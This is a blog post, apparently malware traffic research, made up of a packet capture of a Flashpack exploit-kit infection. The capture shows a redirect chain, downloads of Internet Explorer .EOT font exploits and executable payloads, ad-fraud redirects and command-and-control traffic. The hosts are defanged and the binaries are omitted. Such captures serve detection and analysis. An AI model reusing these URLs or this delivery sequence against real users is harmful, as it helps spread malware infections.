Flashpack Web Based Exploit Kit Exploits Internet Explorer .EOT Font File – Monetizes with Adultfriendfinder and Other Ads

By | June 19, 2015

2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: hitcric[.]info
Connection: Keep-Alive

2014-05-18 22:27:26.841401 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [.], ack 430, win 64240, length 0
2014-05-18 22:27:26.888269 IP 89.46.102.34.80 > 192.168.204.222.49382: Flags [S.], seq 1406020076, ack 4071120677, win 64240, options [mss 1460], length 0
2014-05-18 22:27:26.888430 IP 192.168.204.222.49382 > 89.46.102.34.80: Flags [.], ack 1, win 64240, length 0
2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519
HTTP/1.1 302 Moved Temporarily
Server: nginx admin
Date: Mon, 19 May 2014 02:13:42 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==


302 Found

302 Found


nginx


2014-05-18 22:27:27.030270 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [.], ack 521, win 63721, length 0
(timestamp lost in extraction) IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [F.], seq 430, ack 521, win 63721, length 0
(timestamp lost in extraction) IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [.], ack 431, win 64239, length 0
(timestamp lost in extraction) IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [S], seq 666254775, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-05-18 22:27:28.423428 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [S.], seq 1859092066, ack 666254776, win 64240, options [mss 1460], length 0
2014-05-18 22:27:28.423508 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [.], ack 1, win 64240, length 0
2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605
GET /index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://translate.google[.]com/translate_c?depth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQg
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com

2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:01 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

23b
[gzip-compressed chunk body (0x23b bytes) omitted]
0

2014-05-18 22:27:28.940736 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 606:841, ack 879, win 63362, length 235
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:28.940845 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 841, win 64240, length 0
2014-05-18 22:27:29.224386 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 879:1276, ack 841, win 64240, length 397
HTTP/1.1 404 Not Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:29 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive

cd


404 Not Found

Not Found


The requested URL /favicon.ico was not found on this server.


0

2014-05-18 22:27:29.323940 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 879:1276, ack 841, win 64240, length 397
HTTP/1.1 404 Not Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:29 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive

2014-05-18 22:27:29.641761 IP 192.168.204.222.49384 > 95.154.246.90.80: Flags [P.], seq 1:533, ack 1, win 64240, length 532
GET /index2.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php?s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:29.641819 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [.], ack 533, win 64240, length 0
2014-05-18 22:27:29.916121 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [P.], seq 1:1246, ack 533, win 64240, length 1245
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 19 May 2014 02:27:29 +0000
Content-Encoding: gzip
Vary: Accept-Encoding

3aa
[gzip-compressed chunk body (0x3aa bytes) omitted]
0

2014-05-18 22:27:29.942775 IP 192.168.204.222.49384 > 95.154.246.90.80: Flags [P.], seq 533:801, ack 1246, win 62995, length 268
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:29.942853 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [.], ack 801, win 64240, length 0
2014-05-18 22:27:30.350876 IP 95.154.246.90.80 > 192.168.204.222.49384: Flags [P.], seq 1246:1643, ack 801, win 64240, length 397
HTTP/1.1 404 Not Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:30 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
2014-05-18 22:27:30.657384 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 841:1255, ack 1276, win 62965, length 414
GET /tresting/avalonr/allow.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com/index2.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:30.657637 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 1255, win 64240, length 0
2014-05-18 22:27:30.955568 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1276:1814, ack 1255, win 64240, length 538
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

15b

Not Found

0
2014-05-18 22:27:30.959106 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1255:1806, ack 1814, win 64240, length 551
GET /tresting/avalonr/js/pd.php?id=6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:30.959116 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 1806, win 64240, length 0
2014-05-18 22:27:31.403552 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1814:3082, ack 1806, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699
POST /tresting/avalonr/json.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Content-Length: 207
Connection: Keep-Alive
Cache-Control: no-cache

id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d
2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0
2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

189

0

2014-05-18 22:27:47.708697 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 2505:2900, ack 48554, win 64240, length 395
GET /tresting/avalonr/msie.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/json.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285
GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:48.285695 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 686, win 64240, length 0
2014-05-18 22:27:48.285703 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [.], ack 83580, win 64240, length 0
2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:48 GMT
Content-Type: application/octet-stream
Content-Length: 22319
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: “53796b99-572f”
Accept-Ranges: bytes
2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156
GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Cache-Control: no-cache

2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0
2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:52 GMT
Content-Type: application/octet-stream
Content-Length: 13312
Connection: keep-alive
Last-Modified: Mon, 19 May 2014 02:25:29 GMT
ETag: “53796b99-3400”
Accept-Ranges: bytes

[binary .EOT font body (13312 bytes) omitted]

2014-05-18 22:27:53.032447 IP 192.168.204.222.49390 > 95.154.246.90.80: Flags [.], ack 1, win 64240, length 0
2014-05-18 22:27:53.033429 IP 192.168.204.222.49389 > 95.154.246.90.80: Flags [P.], seq 1:422, ack 1, win 64240, length 421
GET /adsort.php?yy=1&aid=2&atr=exts&src=299 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://ley9nbu9c4c5r3oie3819it529953c1805362f91a2d16b6d071fd5b0.ns1.bayandovmeci[.]com/index2.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: n2yiu4b6vo91nruocik9or9.4gadgets[.]com.mx
Connection: Keep-Alive

2014-05-18 22:27:53.033466 IP 95.154.246.90.80 > 192.168.204.222.49389: Flags [.], ack 422, win 64240, length 0
2014-05-18 22:27:53.037149 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [S.], seq 695012549, ack 1076455371, win 64240, options [mss 1460], length 0
2014-05-18 22:27:53.037493 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [.], ack 1, win 64240, length 0
2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342
GET /tresting/avalonr/loadsilver.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0
2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 94514
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Accept-Ranges: bytes
Content-Disposition: inline; filename=e53796b9e8cb041400466334.exe

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
2014-05-18 22:28:08.099520 IP 95.154.246.90.80 > 192.168.204.222.49390: Flags [P.], seq 341:935, ack 595, win 64240, length 594
HTTP/1.1 302 Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:28:08 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 232
Connection: keep-alive
Set-Cookie: bfmvi=IwkbADQAAgACADdseVP__zdseVNAAAEAAAA3bHlTAA–; expires=Tue, 19-May-2015 02:28:07 GMT; path=/; domain=trafspot[.]com
Location: http://adultfriendfinder[.]com/go/p1011105.subdirs



302 Found

Found

The document has moved here.

2014-05-18 22:28:08.148899 IP 192.168.204.222.49396 > 208.88.180.72.80: Flags [S], seq 3046917735, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-05-18 22:28:08.199274 IP 95.154.246.90.80 > 192.168.204.222.49390: Flags [P.], seq 341:935, ack 595, win 64240, length 594
HTTP/1.1 302 Found
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:28:08 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 232
Connection: keep-alive
Set-Cookie: bfmvi=IwkbADQAAgACADdseVP__zdseVNAAAEAAAA3bHlTAA–; expires=Tue, 19-May-2015 02:28:07 GMT; path=/; domain=trafspot[.]com
Location: http://adultfriendfinder[.]com/go/p1011105.subdirs



302 Found

Found

The document has moved here.

2014-05-18 22:28:08.199756 IP 192.168.204.222.49390 > 95.154.246.90.80: Flags [.], ack 935, win 63306, length 0
2014-05-18 22:28:08.270272 IP 208.88.180.72.80 > 192.168.204.222.49396: Flags [S.], seq 1168056471, ack 3046917736, win 64240, options [mss 1460], length 0
2014-05-18 22:28:08.270376 IP 192.168.204.222.49396 > 208.88.180.72.80: Flags [.], ack 1, win 64240, length 0
2014-05-18 22:28:08.271115 IP 192.168.204.222.49396 > 208.88.180.72.80: Flags [P.], seq 1:279, ack 1, win 64240, length 278
GET /go/p1011105.subdirs HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: adultfriendfinder[.]com
Connection: Keep-Alive
2014-05-18 22:29:03.071417 IP 192.168.204.222.49420 > 173.194.116.114.80: Flags [P.], seq 1:64, ack 1, win 64240, length 63
GET /robots.txt HTTP/1.1
Host: www.google[.]com
Accept: */*

2014-05-18 22:29:03.071533 IP 173.194.116.114.80 > 192.168.204.222.49420: Flags [.], ack 64, win 64240, length 0
2014-05-18 22:29:03.170536 IP 91.121.84.116.21967 > 192.168.204.222.49421: Flags [P.], seq 13:81, ack 27, win 64240, length 68
2014-05-18 22:29:03.170948 IP 192.168.204.222.49421 > 91.121.84.116.21967: Flags [.], ack 81, win 64160, length 0
2014-05-18 22:29:03.227511 IP 173.194.116.114.80 > 192.168.204.222.49420: Flags [P.], seq 1:1269, ack 64, win 64240, length 1268
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 15 Apr 2014 23:05:12 GMT
Date: Mon, 19 May 2014 02:29:03 GMT
Expires: Mon, 19 May 2014 02:29:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic
Transfer-Encoding: chunked

1db8
User-agent: *
Disallow: /search
Disallow: /sdch
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Allow: /catalogs/about
Allow: /catalogs/p?
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow: /index.html?
Disallow: /?
Allow: /?hl=
Disallow: /?hl=*&
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /imgres
Disallow: /imglanding
Disallow: /sbd
Disallow: /keyword/
Disallow: /u/
Disallow: /univ/
Disallow: /cobrand
Disallow: /custom
Disallow: /advanced_group_search
Disallow: /googlesite
Disallow: /preferences
Disallow: /setprefs
Disallow: /swr
Disallow: /url
Disallow: /default
Disallow: /m?
Disallow: /m/
Allow: /m/finance
Disallow: /wml?
Disallow: /wml/?
Disallow: /wml/search?
Disallow: /xhtml?
Disallow: /xhtml/?
Disallow: /xhtml/search?
Disallow: /xml?
Disallow: /imode?
Disal
2014-05-18 22:29:04.528382 IP 192.168.204.222.49422 > 174.143.144.69.25: Flags [P.], seq 1:57, ack 1, win 64240, length 56
GET / HTTP/1.1
Host: 174.143.144.69:25
Accept: */*

2014-05-18 22:29:04.528467 IP 174.143.144.69.25 > 192.168.204.222.49422: Flags [.], ack 57, win 64240, length 0
2014-05-18 22:29:04.627761 IP 91.121.84.116.21967 > 192.168.204.222.49423: Flags [P.], seq 13:74, ack 27, win 64240, length 61
2014-05-18 22:29:04.627862 IP 192.168.204.222.49423 > 91.121.84.116.21967: Flags [.], ack 74, win 64167, length 0
2014-05-18 22:29:04.643628 IP 174.143.144.69.25 > 192.168.204.222.49422: Flags [P.], seq 1:217, ack 57, win 64240, length 216
HTTP/1.1 200 OK
Server: nginx/1.2.8
Date: Mon, 19 May 2014 02:29:04 GMT
Content-Type: text/html
Content-Length: 3
Last-Modified: Wed, 02 Oct 2013 09:22:34 GMT
Connection: keep-alive
Accept-Ranges: bytes
2014-05-18 22:30:17.145134 IP 192.168.204.222.49424 > 95.154.246.90.80: Flags [P.], seq 1:342, ack 1, win 64240, length 341
GET /software.php?05190230760256453 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:30:17.145324 IP 95.154.246.90.80 > 192.168.204.222.49424: Flags [.], ack 342, win 64240, length 0
2014-05-18 22:30:17.399649 IP 95.154.246.90.80 > 192.168.204.222.49424: Flags [P.], seq 1:1269, ack 342, win 64240, length 1268
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:30:17 GMT
Content-Type: application/octet-stream
Content-Length: 136536
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 19 May 2014 02:30:17 +0000
Accept-Ranges: bytes

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-05-18 22:33:10.843036 IP 91.121.84.116.21967 > 192.168.204.222.49482: Flags [P.], seq 1:7, ack 1, win 64240, length 6
HELLO
2014-05-18 22:33:10.843276 IP 192.168.204.222.49482 > 91.121.84.116.21967: Flags [P.], seq 1:20, ack 7, win 64234, length 19
@00CC7ADD:bpass:31
